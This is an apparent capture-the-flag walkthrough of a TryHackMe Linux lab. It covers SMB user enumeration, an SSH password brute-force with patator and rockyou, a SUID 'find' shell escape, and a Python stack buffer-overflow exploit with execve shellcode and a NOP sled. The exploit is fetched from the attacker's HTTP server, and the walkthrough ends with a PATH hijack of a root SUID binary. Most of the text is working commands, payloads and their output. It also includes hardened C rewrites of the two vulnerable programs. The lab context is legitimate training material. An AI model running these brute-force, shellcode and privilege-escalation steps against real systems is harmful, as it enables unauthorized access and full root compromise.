Let’s go:

╭─ ~
╰─❯ nmap -sC -sV 10.10.208.81 -v -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-06 11:47 MSK
...
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3f:36:de:da:2f:c3:b7:78:6f:a9:25:d6:41:dd:54:69 (RSA)
|   256 d0:78:23:ee:f3:71:58:ae:e9:57:14:17:bb:e3:6a:ae (ECDSA)
|_  256 4c:de:f1:49:df:21:4f:32:ca:e6:8e:bc:6a:96:53:e5 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_nbstat: NetBIOS name: THM_EXPLOIT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: thm_exploit
|   NetBIOS computer name: THM_EXPLOIT\x00
|   Domain name: \x00
|   FQDN: thm_exploit
|_  System time: 2024-03-06T08:48:18+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-03-06T08:48:18
|_  start_date: N/A
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.76 seconds

So apart from SSH, the only service to enumerate is SMB.

╭─ ~
╰─❯ smbclient -L 10.10.208.81
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\ch]:
 
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (THM_exploit server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
╭─ ~
╰─❯ enum4linux -a 10.10.208.81
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar  6 11:50:30 2024
 
...
 
 
 ================================( Nbtstat Information for 10.10.208.81 )================================
 
Can't load /etc/samba/smb.conf - run testparm to debug it
Looking up status of 10.10.208.81
        THM_EXPLOIT     <00> -         B <ACTIVE>  Workstation Service
        THM_EXPLOIT     <03> -         B <ACTIVE>  Messenger Service
        THM_EXPLOIT     <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
 
        MAC Address = 00-00-00-00-00-00
 
...
 
 ============================( Password Policy Information for 10.10.208.81 )============================
 
 
 
[+] Attaching to 10.10.208.81 using a NULL share
 
[+] Trying protocol 139/SMB...
 
[+] Found domain(s):
 
        [+] THM_EXPLOIT
        [+] Builtin
 
[+] Password Info for Domain: THM_EXPLOIT
 
        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000
 
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
 
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes
 
 
 
[+] Retieved partial password policy with rpcclient:
 
 
Password Complexity: Disabled
Minimum Password Length: 5
 
...
 
 ==================( Users on 10.10.208.81 via RID cycling (RIDS: 500-550,1000-1050) )==================
 
 
[I] Found new SID:
S-1-22-1
 
[I] Found new SID:
S-1-5-32
 
[I] Found new SID:
S-1-5-32
 
[I] Found new SID:
S-1-5-32
 
[I] Found new SID:
S-1-5-32
 
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
 
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
 
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 
S-1-22-1-1000 Unix User\kel (Local User)
S-1-22-1-1001 Unix User\des (Local User)
S-1-22-1-1002 Unix User\<REDACTED> (Local User)
S-1-22-1-1003 Unix User\noentry (Local User)
 
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
 
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User)
S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group)

The only interesting thing I can see is the list of users.

Looking at the hints on THM:

Hint 1: RID range 1000-1003
Hint 2: The longest username has the unsecure password.

So one of the users we found has an insecure password. Let’s brute-force it.

╭─ ~
╰─❯ patator ssh_login host=10.10.208.81 user=<REDACTED> password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep='failed'
/usr/sbin/patator:2658: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet
12:13:29 patator    INFO - Starting Patator 1.1-dev (https://github.com/lanjelot/patator) with python-3.11.7 at 2024-03-06 12:13 MSK
12:13:29 patator    INFO -
12:13:29 patator    INFO - code  size    time | candidate                          |   num | mesg
12:13:29 patator    INFO - -----------------------------------------------------------------------------
12:16:44 patator    INFO - 0     39     0.254 | <REDACTED>                            |   845 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

Then just connect through SSH and look for SUID binaries:

<REDACTED>@THM_exploit:/$ find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o -perm -2000 -o -perm -6000
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/home/des/bof
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/find
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
/bin/ping

The most interesting SUID binaries are /home/des/bof and /usr/bin/find.

And the next question is “What is the contents of /home/des/flag.txt”

Let’s use the find binary to privesc.

Looking through the GTFOBins page for find, we see:

./find . -exec /bin/sh -p \; -quit

Let’s try that!

<REDACTED>@THM_exploit:/$ id
uid=1002(<REDACTED>) gid=1002(<REDACTED>) groups=1002(<REDACTED>)
<REDACTED>@THM_exploit:/$ find . -exec /bin/bash -p \; -quit
bash-4.4$ id
uid=1002(<REDACTED>) gid=1002(<REDACTED>) euid=1001(des) egid=1001(des) groups=1001(des),1002(<REDACTED>)
bash-4.4$ cd /home/des
bash-4.4$ ls -la
total 52
drwx------ 4 des  des  4096 Jan 17  2020 .
drwxr-xr-x 6 root root 4096 Jan 17  2020 ..
-rw------- 1 root root 1740 Jan 12  2020 .bash_history
-rw-r--r-- 1 des  des   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 des  des  3771 Apr  4  2018 .bashrc
-rwsr-xr-x 1 kel  kel  8600 Jan 17  2020 bof
-rw-r--r-- 1 root root  335 Jan 17  2020 bof64.c
drwx------ 2 des  des  4096 Jan 12  2020 .cache
-r-x------ 1 des  des   237 Jan 17  2020 flag.txt
drwx------ 3 des  des  4096 Jan 12  2020 .gnupg
-rw-r--r-- 1 des  des   807 Apr  4  2018 .profile
bash-4.4$ cat flag.txt
Good job on exploiting the SUID file. Never assign +s to any system executable files. Remember, Check gtfobins.
 
You flag is THM{REDACTED}
 
login crdential (In case you need it)
username: des
password: <REDACTED>
bash-4.4$

Now let’s SSH in as des for a more stable session.

The next target is /home/kel/flag.txt.

To read it, I assume we will use the binary /home/des/bof (SUID, owned by kel).

Let’s read the source with cat bof64.c:

#include <stdio.h>
#include <unistd.h>

int foo(){
        char buffer[600];                            /* 600-byte stack buffer */
        int characters_read;
        printf("Enter some string:\n");
        characters_read = read(0, buffer, 1000);     /* reads up to 1000 bytes: 400 past the end of buffer */
        printf("You entered: %s", buffer);           /* buffer is never NUL-terminated either */
        return 0;
}

void main(){
        setresuid(geteuid(), geteuid(), geteuid());  /* make the SUID owner (kel) the real uid too, so a spawned shell keeps it */
        setresgid(getegid(), getegid(), getegid());

        foo();
}

A pretty easily exploitable binary: read() accepts up to 1000 bytes into a 600-byte stack buffer, so everything after the buffer (saved RBP, return address) is under our control.
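As an added example (not the room's code), this is how foo() should have been written: the read is bounded by the buffer size and the result is NUL-terminated, so a 1000-byte line never reaches the saved RBP or return address. The pipe-based feed_and_count helper is a constructed test harness so the bounded reader can be exercised without a terminal.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 600   /* same buffer size as the room's foo() */

/* Bounded replacement for the room's read(0, buffer, 1000): never ask
 * for more than the buffer holds, and always NUL-terminate so the
 * following printf("%s") cannot read past the end either.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_input_bounded(int fd, char *buffer, size_t cap)
{
    if (buffer == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, buffer, cap - 1);   /* leave room for the NUL */
    if (n < 0)
        return -1;
    buffer[n] = '\0';
    return n;
}

/* Hardened foo(): identical output for well-formed input, but a
 * 1000-byte line can no longer reach the saved RBP or return address. */
int foo_fixed(void)
{
    char buffer[BUF_SIZE];
    printf("Enter some string:\n");
    if (read_input_bounded(STDIN_FILENO, buffer, sizeof buffer) < 0)
        return 1;
    printf("You entered: %s", buffer);
    return 0;
}

/* Constructed test helper: push `len` bytes of 'A' through a pipe and
 * report how many of them the bounded reader accepted. */
ssize_t feed_and_count(size_t len)
{
    int fds[2];
    char buffer[BUF_SIZE];
    if (pipe(fds) != 0)
        return -1;
    char *input = malloc(len ? len : 1);
    if (input == NULL) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    memset(input, 'A', len);
    ssize_t wrote = write(fds[1], input, len);
    close(fds[1]);                          /* EOF for the reader */
    ssize_t got = (wrote == (ssize_t)len)
                ? read_input_bounded(fds[0], buffer, sizeof buffer) : -1;
    close(fds[0]);
    free(input);
    return got;
}

int main(void) { return foo_fixed(); }
```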

Let’s download it to our host and exploit it locally first.

On the target we run python3 -m http.server

And on the host:

wget http://10.10.208.81:8000/bof
wget http://10.10.208.81:8000/bof64.c
chmod +x bof

I will use gdb with pwndbg for debugging.

(If you are not familiar with gdb extensions, I really recommend using this one.)

pwndbg> file bof
pwndbg> cyclic 500
pwndbg> run

And paste the cyclic output into the prompt.

Program received signal SIGSEGV, Segmentation fault.
0x000055555540084e in foo ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────
 RAX  0x0
*RBX  0x3d8
 RCX  0x0
 RDX  0x0
*RDI  0x7fffffffd830 —▸ 0x7fffffffd860 ◂— 0x61616e6361616161 ('aaaacnaa')
*RSI  0x7fffffffd860 ◂— 0x61616e6361616161 ('aaaacnaa')
*R8   0x73
*R9   0x1
 R10  0x0
*R11  0x246
*R12  0x3d8
*R13  0x7fffffffddb8 ◂— 0x6561616161616172 ('raaaaaae')
*R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555400000 ◂— jg 0x555555400047
 R15  0x0
*RBP  0x6461616161616162 ('baaaaaad')
*RSP  0x7fffffffdc78 ◂— 0x6461616161616163 ('caaaaaad')
*RIP  0x55555540084e (foo+84) ◂— ret
──────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────
 ► 0x55555540084e <foo+84>    ret    <0x6461616161616163>

Now we can just use cyclic again to find the offset.

pwndbg> cyclic -l $rbp
Finding cyclic pattern of 8 bytes: b'baaaaaad' (hex: 0x6261616161616164)
Found at offset 608
pwndbg> cyclic -l caaaaaad
Finding cyclic pattern of 8 bytes: b'caaaaaad' (hex: 0x6361616161616164)
Found at offset 616

Now we know that the offset to the saved RBP is 608 (and 616 to the return address).

Let’s check whether we really control it:

pwndbg> run <<(python2 -c 'print "A"*608 + "testing1"')

Program received signal SIGSEGV, Segmentation fault.
0x000055555540080a in foo ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────
*RAX  0x0
 RBX  0x3d8
*RCX  0x0
*RDX  0x0
*RDI  0x7fffffffd830 —▸ 0x7fffffffd860 ◂— 0x4141414141414141 ('AAAAAAAA')
*RSI  0x7fffffffd860 ◂— 0x4141414141414141 ('AAAAAAAA')
*R8   0x73
 R9   0x1
*R10  0x0
 R11  0x246
 R12  0x3d8
*R13  0x7fffffffddb8 —▸ 0x7fffffffe070 ◂— 'SHELL=/usr/bin/zsh'
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555400000 ◂— jg 0x555555400047
 R15  0x0
*RBP  0x31676e6974736574 ('testing1')
*RSP  0x7fffffffdc80 —▸ 0x7fffffffdda8 —▸ 0x7fffffffe055 ◂— '/home/ch/ctf/thm/binex/bof'
*RIP  0x55555540080a (foo+16) ◂— add byte ptr [rax], al

We see that RBP is now our string.

Let’s check the stack and find an address we can return to later.

To do so we need to run gdb on the target, since we need the stack addresses of the target process, not of our local copy.

(gdb) x/200x $rsp-700
0x7fffffffe1dc: 0x00007fff      0x00000012      0x00000000      0xf7dd0760
0x7fffffffe1ec: 0x00007fff      0x55554934      0x00005555      0xf7a64b62
0x7fffffffe1fc: 0x00007fff      0xf79e90e8      0x00007fff      0x000003e9
0x7fffffffe20c: 0x00000000      0xffffe490      0x00007fff      0x000003e9
0x7fffffffe21c: 0x00000000      0xffffe590      0x00007fff      0x55554848
0x7fffffffe22c: 0x00005555      0x61616161      0x61616161      0x61616162
0x7fffffffe23c: 0x61616161      0x61616163      0x61616161      0x61616164
0x7fffffffe24c: 0x61616161      0x61616165      0x61616161      0x61616166
0x7fffffffe25c: 0x61616161      0x61616167      0x61616161      0x61616168
0x7fffffffe26c: 0x61616161      0x61616169      0x61616161      0x6161616a
0x7fffffffe27c: 0x61616161      0x6161616b      0x61616161      0x6161616c
0x7fffffffe28c: 0x61616161      0x6161616d      0x61616161      0x6161616e
0x7fffffffe29c: 0x61616161      0x6161616f      0x61616161      0x61616170
0x7fffffffe2ac: 0x61616161      0x61616171      0x61616161      0x61616172
0x7fffffffe2bc: 0x61616161      0x61616173      0x61616161      0x61616174
0x7fffffffe2cc: 0x61616161      0x61616175      0x61616161      0x61616176
0x7fffffffe2dc: 0x61616161      0x61616177      0x61616161      0x61616178
0x7fffffffe2ec: 0x61616161      0x61616179      0x61616161      0x6161617a
0x7fffffffe2fc: 0x62616161      0x61616162      0x62616161      0x61616163
0x7fffffffe30c: 0x62616161      0x61616164      0x62616161      0x61616165
0x7fffffffe31c: 0x62616161      0x61616166      0x62616161      0x61616167
0x7fffffffe32c: 0x62616161      0x61616168      0x62616161      0x61616169
0x7fffffffe33c: 0x62616161      0x6161616a      0x62616161      0x6161616b
0x7fffffffe34c: 0x62616161      0x6161616c      0x62616161      0x6161616d
0x7fffffffe35c: 0x62616161      0x6161616e      0x62616161      0x6161616f
0x7fffffffe36c: 0x62616161      0x61616170      0x62616161      0x61616171
0x7fffffffe37c: 0x62616161      0x61616172      0x62616161      0x61616173
0x7fffffffe38c: 0x62616161      0x61616174      0x62616161      0x61616175
0x7fffffffe39c: 0x62616161      0x61616176      0x62616161      0x61616177
0x7fffffffe3ac: 0x62616161      0x61616178      0x62616161      0x61616179
0x7fffffffe3bc: 0x62616161      0x6161617a      0x63616161      0x61616162
0x7fffffffe3cc: 0x63616161      0x61616163      0x63616161      0x61616164
0x7fffffffe3dc: 0x63616161      0x61616165      0x63616161      0x61616166
0x7fffffffe3ec: 0x63616161      0x61616167      0x63616161      0x61616168
0x7fffffffe3fc: 0x63616161      0x61616169      0x63616161      0x6161616a
0x7fffffffe40c: 0x63616161      0x6161616b      0x63616161      0x6161616c
0x7fffffffe41c: 0x63616161      0x6161616d      0x63616161      0x6161616e
0x7fffffffe42c: 0x63616161      0x6161616f      0x63616161      0x61616170
0x7fffffffe43c: 0x63616161      0x61616171      0x63616161      0x61616172
0x7fffffffe44c: 0x63616161      0x61616173      0x63616161      0x61616174
0x7fffffffe45c: 0x63616161      0x61616175      0x63616161      0x61616176
0x7fffffffe46c: 0x63616161      0x61616177      0x63616161      0x61616178
0x7fffffffe47c: 0x63616161      0x61616179      0x63616161      0x6161617a
0x7fffffffe48c: 0x000003e8      0x61616162      0x64616161      0x61616163
0x7fffffffe49c: 0x64616161      0x61616164      0x64616161      0x61616165
0x7fffffffe4ac: 0x64616161      0x61616166      0x64616161      0x61616167
0x7fffffffe4bc: 0x64616161      0x61616168      0x64616161      0x61616169
0x7fffffffe4cc: 0x64616161      0x6161616a      0x64616161      0x6161616b
0x7fffffffe4dc: 0x64616161      0x6161616c      0x64616161      0x6161616d
0x7fffffffe4ec: 0x64616161      0x6161616e      0x64616161      0x6161616f
...

For example, let’s choose 0x7fffffffe33c, which lies in the middle of the pattern bytes, i.e. where our NOP sled will be.

Let’s use the shellcode from the hint.

We create this python2 script:

from struct import pack

nop = "\x90"
# execve("/bin//sh") shellcode from the room's hint
shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

payload = nop * 400                          # NOP sled
payload += shellcode
payload += "A" * (216 - len(shellcode))      # pad to the 616-byte offset (this also overwrites the saved RBP)
payload += pack("<Q", 0x7fffffffe33c)        # return address: inside the NOP sled on the target

print payload

We use 616 and not 608 because we need to overwrite the saved return address (what RSP points at when foo returns), not the saved RBP; it always sits 8 bytes past the saved RBP.

Of those 616 bytes, 400 are NOPs and the remaining 216 are the shellcode padded with A’s (the last 8 of the 216 land on the saved RBP). Then come the 8 bytes of the return address, which now points into the NOP sled.

Now let’s run it and see. On the host:

python -m http.server

On target:

wget http://10.14.72.171:8000/ex.py
python2 ex.py > payl
(cat payl; cat) | ./bof

And we have a shell as kel:

id
uid=1000(kel) gid=1001(des) groups=1001(des)
 
cd /home/kel
ls -la
total 52
drwx------ 4 kel  kel  4096 Jan 17  2020 .
drwxr-xr-x 6 root root 4096 Jan 17  2020 ..
-rw------- 1 root root   16 Jan 12  2020 .bash_history
-rw-r--r-- 1 kel  kel   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 kel  kel  3771 Apr  4  2018 .bashrc
drwx------ 2 kel  kel  4096 Jan 12  2020 .cache
drwx------ 3 kel  kel  4096 Jan 12  2020 .gnupg
-rw-r--r-- 1 kel  kel   807 Apr  4  2018 .profile
-rwsr-xr-x 1 root root 8392 Jan 17  2020 exe
-rw-r--r-- 1 root root   76 Jan 17  2020 exe.c
-rw------- 1 kel  kel   118 Jan 17  2020 flag.txt
 
cat flag.txt
You flag is THM{<REDACTED>}
 
The user credential
username: kel
password: <REDACTED>

Now we can just SSH in as kel.

We already know from the earlier ls -la that /home/kel/exe is a SUID binary owned by root.

Let’s check its source code (cat exe.c):

#include <stdlib.h>   /* for system(); missing from the original file */
#include <unistd.h>

void main()
{
        setuid(0);
        setgid(0);
        system("ps");   /* "ps" is looked up through the caller's PATH */
}

Oh, very easy. system("ps") resolves ps through PATH, so we just need to put our own ps executable in a directory that comes first in PATH.

export PATH=`pwd`:$PATH
cp /bin/sh ./ps
./exe
 
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),1000(kel)
# ls -la /root
total 36
drwx------  4 root root 4096 Jan 17  2020 .
drwxr-xr-x 26 root root 4096 Jan 12  2020 ..
-rw-------  1 root root 7562 Jan 17  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jan 12  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  128 Jan 17  2020 root.txt
drwx------  2 root root 4096 Jan 12  2020 .ssh
# cat /root/root.txt
The flag: THM{<REDACTED>}.
Also, thank you for your participation.
 
The room is built with love. DesKel out.
#
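As an added example (not the room's code), this is what a setuid program that needs ps should do instead of system("ps"): resolve the command against a fixed list of trusted directories and execve it with a minimal environment, so the caller's PATH is never consulted. TRUSTED_DIRS, resolve_trusted and run_trusted are names chosen for this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed search list; never taken from the caller's environment. */
static const char *const TRUSTED_DIRS[] = {
    "/usr/sbin", "/usr/bin", "/sbin", "/bin"
};

/* Resolve a bare command name against TRUSTED_DIRS only. Returns 0 and
 * writes an absolute path into `out`, or -1 if the name contains a
 * slash, is empty, or is not an executable in any trusted directory. */
int resolve_trusted(const char *name, char *out, size_t cap)
{
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;
    size_t ndirs = sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0];
    for (size_t i = 0; i < ndirs; i++) {
        int n = snprintf(out, cap, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= cap)
            return -1;
        if (access(out, X_OK) == 0)
            return 0;
    }
    return -1;
}

/* What exe should have done instead of system("ps"): resolve from the
 * fixed list, then execve with a minimal environment so neither PATH
 * nor anything else comes from the caller.
 * Returns the child's exit status, or -1 on failure. */
int run_trusted(const char *name)
{
    char path[256];
    if (resolve_trusted(name, path, sizeof path) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { path, NULL };
        char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
        execve(path, argv, envp);
        _exit(127);             /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) { return run_trusted("ps") == 0 ? 0 : 1; }
```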

I really struggled with the buffer overflow since at first I tried pwntools and running the executable on a port, but it was unnecessary. Also, I forgot about the return address at first and was trying to get a working exploit for more than 2 hours.